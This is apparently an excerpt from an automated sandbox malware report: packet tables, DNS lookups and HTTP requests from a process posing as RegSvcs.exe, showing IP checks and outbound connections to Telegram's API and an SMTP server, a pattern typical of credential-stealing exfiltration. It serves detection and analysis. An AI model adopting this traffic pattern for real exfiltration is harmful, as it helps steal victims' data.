                                                  Sep 18, 2024 15:26:20.707487106 CEST44349724188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:20.713116884 CEST44349723188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:20.723635912 CEST49723443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:20.723651886 CEST44349723188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:20.863096952 CEST44349723188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:20.863348961 CEST44349723188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:20.863535881 CEST49723443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:20.863960981 CEST49723443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:20.868601084 CEST4972580192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:20.873620987 CEST8049725132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:20.873785973 CEST4972580192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:20.873878956 CEST4972580192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:20.878861904 CEST8049725132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:21.175132036 CEST44349724188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:21.184497118 CEST49724443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:21.184520006 CEST44349724188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:21.311475992 CEST44349724188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:21.311572075 CEST44349724188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:21.311845064 CEST49724443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:21.312311888 CEST49724443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:21.327735901 CEST4971880192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:21.332992077 CEST8049718132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:21.333149910 CEST4971880192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:21.335975885 CEST49726443192.168.2.7149.154.167.220
                                                  Sep 18, 2024 15:26:21.336096048 CEST44349726149.154.167.220192.168.2.7
                                                  Sep 18, 2024 15:26:21.336267948 CEST49726443192.168.2.7149.154.167.220
                                                  Sep 18, 2024 15:26:21.336587906 CEST49726443192.168.2.7149.154.167.220
                                                  Sep 18, 2024 15:26:21.336611986 CEST44349726149.154.167.220192.168.2.7
                                                  Sep 18, 2024 15:26:22.551131964 CEST44349726149.154.167.220192.168.2.7
                                                  Sep 18, 2024 15:26:22.551253080 CEST49726443192.168.2.7149.154.167.220
                                                  Sep 18, 2024 15:26:22.555696011 CEST49726443192.168.2.7149.154.167.220
                                                  Sep 18, 2024 15:26:22.555742979 CEST44349726149.154.167.220192.168.2.7
                                                  Sep 18, 2024 15:26:22.556129932 CEST44349726149.154.167.220192.168.2.7
                                                  Sep 18, 2024 15:26:22.558027983 CEST49726443192.168.2.7149.154.167.220
                                                  Sep 18, 2024 15:26:22.603406906 CEST44349726149.154.167.220192.168.2.7
                                                  Sep 18, 2024 15:26:22.795937061 CEST44349726149.154.167.220192.168.2.7
                                                  Sep 18, 2024 15:26:22.796118975 CEST44349726149.154.167.220192.168.2.7
                                                  Sep 18, 2024 15:26:22.796206951 CEST49726443192.168.2.7149.154.167.220
                                                  Sep 18, 2024 15:26:22.801835060 CEST49726443192.168.2.7149.154.167.220
                                                  Sep 18, 2024 15:26:23.318131924 CEST8049725132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:23.320030928 CEST49727443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:23.320087910 CEST44349727188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:23.320202112 CEST49727443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:23.320521116 CEST49727443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:23.320534945 CEST44349727188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:23.363383055 CEST4972580192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:23.794115067 CEST44349727188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:23.795672894 CEST49727443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:23.795700073 CEST44349727188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:23.966473103 CEST44349727188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:23.966696024 CEST44349727188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:23.966769934 CEST49727443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:23.967485905 CEST49727443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:23.971622944 CEST4972580192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:23.973031998 CEST4972880192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:23.976891041 CEST8049725132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:23.976990938 CEST4972580192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:23.977941990 CEST8049728132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:23.978034019 CEST4972880192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:23.978149891 CEST4972880192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:23.982935905 CEST8049728132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:25.426209927 CEST8049728132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:25.427628040 CEST49729443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:25.427670002 CEST44349729188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:25.427745104 CEST49729443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:25.428021908 CEST49729443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:25.428031921 CEST44349729188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:25.472589016 CEST4972880192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:25.892620087 CEST44349729188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:25.894117117 CEST49729443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:25.894144058 CEST44349729188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:26.030977011 CEST44349729188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:26.031234980 CEST44349729188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:26.031286955 CEST49729443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:26.031836987 CEST49729443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:26.035783052 CEST4972880192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:26.036855936 CEST4973080192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:26.040873051 CEST8049728132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:26.040944099 CEST4972880192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:26.041795015 CEST8049730132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:26.041867971 CEST4973080192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:26.041965008 CEST4973080192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:26.047135115 CEST8049730132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:27.814801931 CEST8049730132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:27.816521883 CEST49731443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:27.816575050 CEST44349731188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:27.816659927 CEST49731443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:27.816963911 CEST49731443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:27.816982031 CEST44349731188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:27.863256931 CEST4973080192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:27.988236904 CEST4970280192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:28.158102989 CEST49732587192.168.2.7208.91.198.143
                                                  Sep 18, 2024 15:26:28.163054943 CEST58749732208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:28.163173914 CEST49732587192.168.2.7208.91.198.143
                                                  Sep 18, 2024 15:26:28.280277967 CEST44349731188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:28.282243013 CEST49731443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:28.282272100 CEST44349731188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:28.436475039 CEST44349731188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:28.436722994 CEST44349731188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:28.436775923 CEST49731443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:28.437213898 CEST49731443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:28.442049026 CEST4973080192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:28.442913055 CEST4973380192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:28.447932005 CEST8049730132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:28.447987080 CEST4973080192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:28.448525906 CEST8049733132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:28.448612928 CEST4973380192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:28.448720932 CEST4973380192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:28.453852892 CEST8049733132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:30.499630928 CEST8049733132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:30.500865936 CEST49734443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:30.500967026 CEST44349734188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:30.501069069 CEST49734443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:30.501312971 CEST49734443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:30.501338959 CEST44349734188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:30.550761938 CEST4973380192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:30.963814020 CEST44349734188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:30.965286970 CEST49734443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:30.965378046 CEST44349734188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:31.102402925 CEST44349734188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:31.102632999 CEST44349734188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:31.102709055 CEST49734443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:31.102993011 CEST49734443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:31.107072115 CEST4973380192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:31.107629061 CEST4973580192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:31.112163067 CEST8049733132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:31.112247944 CEST4973380192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:31.112442970 CEST8049735132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:31.112617970 CEST4973580192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:31.112776041 CEST4973580192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:31.117526054 CEST8049735132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:31.248635054 CEST58749732208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:31.248863935 CEST49732587192.168.2.7208.91.198.143
                                                  Sep 18, 2024 15:26:31.253777027 CEST58749732208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:31.403965950 CEST58749732208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:31.409096956 CEST49732587192.168.2.7208.91.198.143
                                                  Sep 18, 2024 15:26:31.414763927 CEST58749732208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:31.579674959 CEST58749732208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:31.580048084 CEST49732587192.168.2.7208.91.198.143
                                                  Sep 18, 2024 15:26:31.584983110 CEST58749732208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:31.740420103 CEST58749732208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:31.740645885 CEST49732587192.168.2.7208.91.198.143
                                                  Sep 18, 2024 15:26:31.745482922 CEST58749732208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:31.896560907 CEST58749732208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:31.896810055 CEST49732587192.168.2.7208.91.198.143
                                                  Sep 18, 2024 15:26:31.901649952 CEST58749732208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:31.914226055 CEST8049735132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:31.915527105 CEST49736443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:31.915581942 CEST44349736188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:31.915663958 CEST49736443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:31.915915966 CEST49736443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:31.915927887 CEST44349736188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:31.957099915 CEST4973580192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:32.392853975 CEST58749732208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:32.393096924 CEST49732587192.168.2.7208.91.198.143
                                                  Sep 18, 2024 15:26:32.394371986 CEST58749732208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:32.394438982 CEST49732587192.168.2.7208.91.198.143
                                                  Sep 18, 2024 15:26:32.398363113 CEST58749732208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:32.402188063 CEST44349736188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:32.405505896 CEST49736443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:32.405538082 CEST44349736188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:32.531363964 CEST44349736188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:32.531619072 CEST44349736188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:32.531718016 CEST49736443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:32.540601015 CEST49736443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:32.544545889 CEST4973580192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:32.546030045 CEST4973780192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:32.549065113 CEST58749732208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:32.549962997 CEST49732587192.168.2.7208.91.198.143
                                                  Sep 18, 2024 15:26:32.550013065 CEST8049735132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:32.550055027 CEST49732587192.168.2.7208.91.198.143
                                                  Sep 18, 2024 15:26:32.550087929 CEST4973580192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:32.550270081 CEST49732587192.168.2.7208.91.198.143
                                                  Sep 18, 2024 15:26:32.550303936 CEST49732587192.168.2.7208.91.198.143
                                                  Sep 18, 2024 15:26:32.551059008 CEST8049737132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:32.551156044 CEST4973780192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:32.551311016 CEST4973780192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:32.555098057 CEST58749732208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:32.555126905 CEST58749732208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:32.555157900 CEST58749732208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:32.555363894 CEST58749732208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:32.556154966 CEST8049737132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:32.937063932 CEST58749732208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:32.988284111 CEST49732587192.168.2.7208.91.198.143
                                                  Sep 18, 2024 15:26:34.453485966 CEST8049737132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:34.455197096 CEST49738443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:34.455245972 CEST44349738188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:34.455347061 CEST49738443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:34.455704927 CEST49738443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:34.455717087 CEST44349738188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:34.503931046 CEST4973780192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:34.934053898 CEST44349738188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:34.935914040 CEST49738443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:34.935991049 CEST44349738188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:35.081011057 CEST44349738188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:35.081262112 CEST44349738188.114.96.3192.168.2.7
                                                  Sep 18, 2024 15:26:35.081358910 CEST49738443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:35.082031012 CEST49738443192.168.2.7188.114.96.3
                                                  Sep 18, 2024 15:26:35.091914892 CEST4973780192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:35.092746973 CEST49739443192.168.2.7149.154.167.220
                                                  Sep 18, 2024 15:26:35.092792034 CEST44349739149.154.167.220192.168.2.7
                                                  Sep 18, 2024 15:26:35.093034983 CEST49739443192.168.2.7149.154.167.220
                                                  Sep 18, 2024 15:26:35.093569040 CEST49739443192.168.2.7149.154.167.220
                                                  Sep 18, 2024 15:26:35.093584061 CEST44349739149.154.167.220192.168.2.7
                                                  Sep 18, 2024 15:26:35.097532034 CEST8049737132.226.8.169192.168.2.7
                                                  Sep 18, 2024 15:26:35.097665071 CEST4973780192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:35.715790033 CEST44349739149.154.167.220192.168.2.7
                                                  Sep 18, 2024 15:26:35.715943098 CEST49739443192.168.2.7149.154.167.220
                                                  Sep 18, 2024 15:26:35.717524052 CEST49739443192.168.2.7149.154.167.220
                                                  Sep 18, 2024 15:26:35.717547894 CEST44349739149.154.167.220192.168.2.7
                                                  Sep 18, 2024 15:26:35.717888117 CEST44349739149.154.167.220192.168.2.7
                                                  Sep 18, 2024 15:26:35.719176054 CEST49739443192.168.2.7149.154.167.220
                                                  Sep 18, 2024 15:26:35.759464979 CEST44349739149.154.167.220192.168.2.7
                                                  Sep 18, 2024 15:26:35.964056015 CEST44349739149.154.167.220192.168.2.7
                                                  Sep 18, 2024 15:26:35.964231968 CEST44349739149.154.167.220192.168.2.7
                                                  Sep 18, 2024 15:26:35.964359045 CEST49739443192.168.2.7149.154.167.220
                                                  Sep 18, 2024 15:26:35.976104021 CEST49739443192.168.2.7149.154.167.220
                                                  Sep 18, 2024 15:26:41.152389050 CEST4972280192.168.2.7132.226.8.169
                                                  Sep 18, 2024 15:26:41.291837931 CEST49740587192.168.2.7208.91.198.143
                                                  Sep 18, 2024 15:26:41.298190117 CEST58749740208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:41.298403978 CEST49740587192.168.2.7208.91.198.143
                                                  Sep 18, 2024 15:26:42.476718903 CEST58749740208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:42.476996899 CEST49740587192.168.2.7208.91.198.143
                                                  Sep 18, 2024 15:26:42.481950998 CEST58749740208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:42.632097960 CEST58749740208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:42.632476091 CEST49740587192.168.2.7208.91.198.143
                                                  Sep 18, 2024 15:26:42.638077974 CEST58749740208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:42.792351007 CEST58749740208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:42.792707920 CEST49740587192.168.2.7208.91.198.143
                                                  Sep 18, 2024 15:26:42.798744917 CEST58749740208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:43.024652958 CEST58749740208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:43.024918079 CEST49740587192.168.2.7208.91.198.143
                                                  Sep 18, 2024 15:26:43.029743910 CEST58749740208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:43.181026936 CEST58749740208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:43.181200981 CEST49740587192.168.2.7208.91.198.143
                                                  Sep 18, 2024 15:26:43.185972929 CEST58749740208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:43.360907078 CEST58749740208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:43.361311913 CEST49740587192.168.2.7208.91.198.143
                                                  Sep 18, 2024 15:26:43.366221905 CEST58749740208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:43.692055941 CEST58749740208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:43.693670034 CEST49740587192.168.2.7208.91.198.143
                                                  Sep 18, 2024 15:26:43.693873882 CEST49740587192.168.2.7208.91.198.143
                                                  Sep 18, 2024 15:26:43.693931103 CEST49740587192.168.2.7208.91.198.143
                                                  Sep 18, 2024 15:26:43.693985939 CEST49740587192.168.2.7208.91.198.143
                                                  Sep 18, 2024 15:26:43.698427916 CEST58749740208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:43.698662996 CEST58749740208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:43.698790073 CEST58749740208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:43.698852062 CEST58749740208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:44.086220980 CEST58749740208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:26:44.128993034 CEST49740587192.168.2.7208.91.198.143
                                                  Sep 18, 2024 15:28:08.176207066 CEST49732587192.168.2.7208.91.198.143
                                                  Sep 18, 2024 15:28:08.181121111 CEST58749732208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:28:08.331727028 CEST58749732208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:28:08.331828117 CEST58749732208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:28:08.331876993 CEST49732587192.168.2.7208.91.198.143
                                                  Sep 18, 2024 15:28:08.331978083 CEST49732587192.168.2.7208.91.198.143
                                                  Sep 18, 2024 15:28:08.336838007 CEST58749732208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:28:21.316992998 CEST49740587192.168.2.7208.91.198.143
                                                  Sep 18, 2024 15:28:21.321940899 CEST58749740208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:28:21.474251986 CEST58749740208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:28:21.474865913 CEST58749740208.91.198.143192.168.2.7
                                                  Sep 18, 2024 15:28:21.474937916 CEST49740587192.168.2.7208.91.198.143
                                                  Sep 18, 2024 15:28:21.475023031 CEST49740587192.168.2.7208.91.198.143
                                                  Sep 18, 2024 15:28:21.481599092 CEST58749740208.91.198.143192.168.2.7

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Sep 18, 2024 15:26:01.900065899 CEST5173253192.168.2.71.1.1.1
                                                  Sep 18, 2024 15:26:01.907663107 CEST53517321.1.1.1192.168.2.7
                                                  Sep 18, 2024 15:26:04.108913898 CEST6432453192.168.2.71.1.1.1
                                                  Sep 18, 2024 15:26:04.118988037 CEST53643241.1.1.1192.168.2.7
                                                  Sep 18, 2024 15:26:21.328557968 CEST5848153192.168.2.71.1.1.1
                                                  Sep 18, 2024 15:26:21.335287094 CEST53584811.1.1.1192.168.2.7
                                                  Sep 18, 2024 15:26:28.147953033 CEST6486553192.168.2.71.1.1.1
                                                  Sep 18, 2024 15:26:28.157243967 CEST53648651.1.1.1192.168.2.7

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Sep 18, 2024 15:26:01.900065899 CEST192.168.2.71.1.1.10xb130Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                  Sep 18, 2024 15:26:04.108913898 CEST192.168.2.71.1.1.10x17faStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                  Sep 18, 2024 15:26:21.328557968 CEST192.168.2.71.1.1.10x5cfcStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                  Sep 18, 2024 15:26:28.147953033 CEST192.168.2.71.1.1.10xc0c3Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)false

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Sep 18, 2024 15:26:01.907663107 CEST1.1.1.1192.168.2.70xb130No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                  Sep 18, 2024 15:26:01.907663107 CEST1.1.1.1192.168.2.70xb130No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                  Sep 18, 2024 15:26:01.907663107 CEST1.1.1.1192.168.2.70xb130No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                  Sep 18, 2024 15:26:01.907663107 CEST1.1.1.1192.168.2.70xb130No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                  Sep 18, 2024 15:26:01.907663107 CEST1.1.1.1192.168.2.70xb130No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                  Sep 18, 2024 15:26:01.907663107 CEST1.1.1.1192.168.2.70xb130No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                  Sep 18, 2024 15:26:04.118988037 CEST1.1.1.1192.168.2.70x17faNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                  Sep 18, 2024 15:26:04.118988037 CEST1.1.1.1192.168.2.70x17faNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                  Sep 18, 2024 15:26:21.335287094 CEST1.1.1.1192.168.2.70x5cfcNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                  Sep 18, 2024 15:26:28.157243967 CEST1.1.1.1192.168.2.70xc0c3No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                  Sep 18, 2024 15:26:28.157243967 CEST1.1.1.1192.168.2.70xc0c3No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                  Sep 18, 2024 15:26:28.157243967 CEST1.1.1.1192.168.2.70xc0c3No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                  Sep 18, 2024 15:26:28.157243967 CEST1.1.1.1192.168.2.70xc0c3No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false

                                                  HTTP Request Dependency Graph

                                                  • reallyfreegeoip.org
                                                  • api.telegram.org
                                                  • checkip.dyndns.org

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.749699132.226.8.169803636C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 18, 2024 15:26:01.919477940 CEST151OUTGET / HTTP/1.1
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                  Host: checkip.dyndns.org
                                                  Connection: Keep-Alive
                                                  Sep 18, 2024 15:26:03.721055031 CEST272INHTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:03 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 103
                                                  Connection: keep-alive
                                                  Cache-Control: no-cache
                                                  Pragma: no-cache
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                  Sep 18, 2024 15:26:03.776456118 CEST127OUTGET / HTTP/1.1
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                  Host: checkip.dyndns.org
                                                  Sep 18, 2024 15:26:04.072740078 CEST272INHTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:03 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 103
                                                  Connection: keep-alive
                                                  Cache-Control: no-cache
                                                  Pragma: no-cache
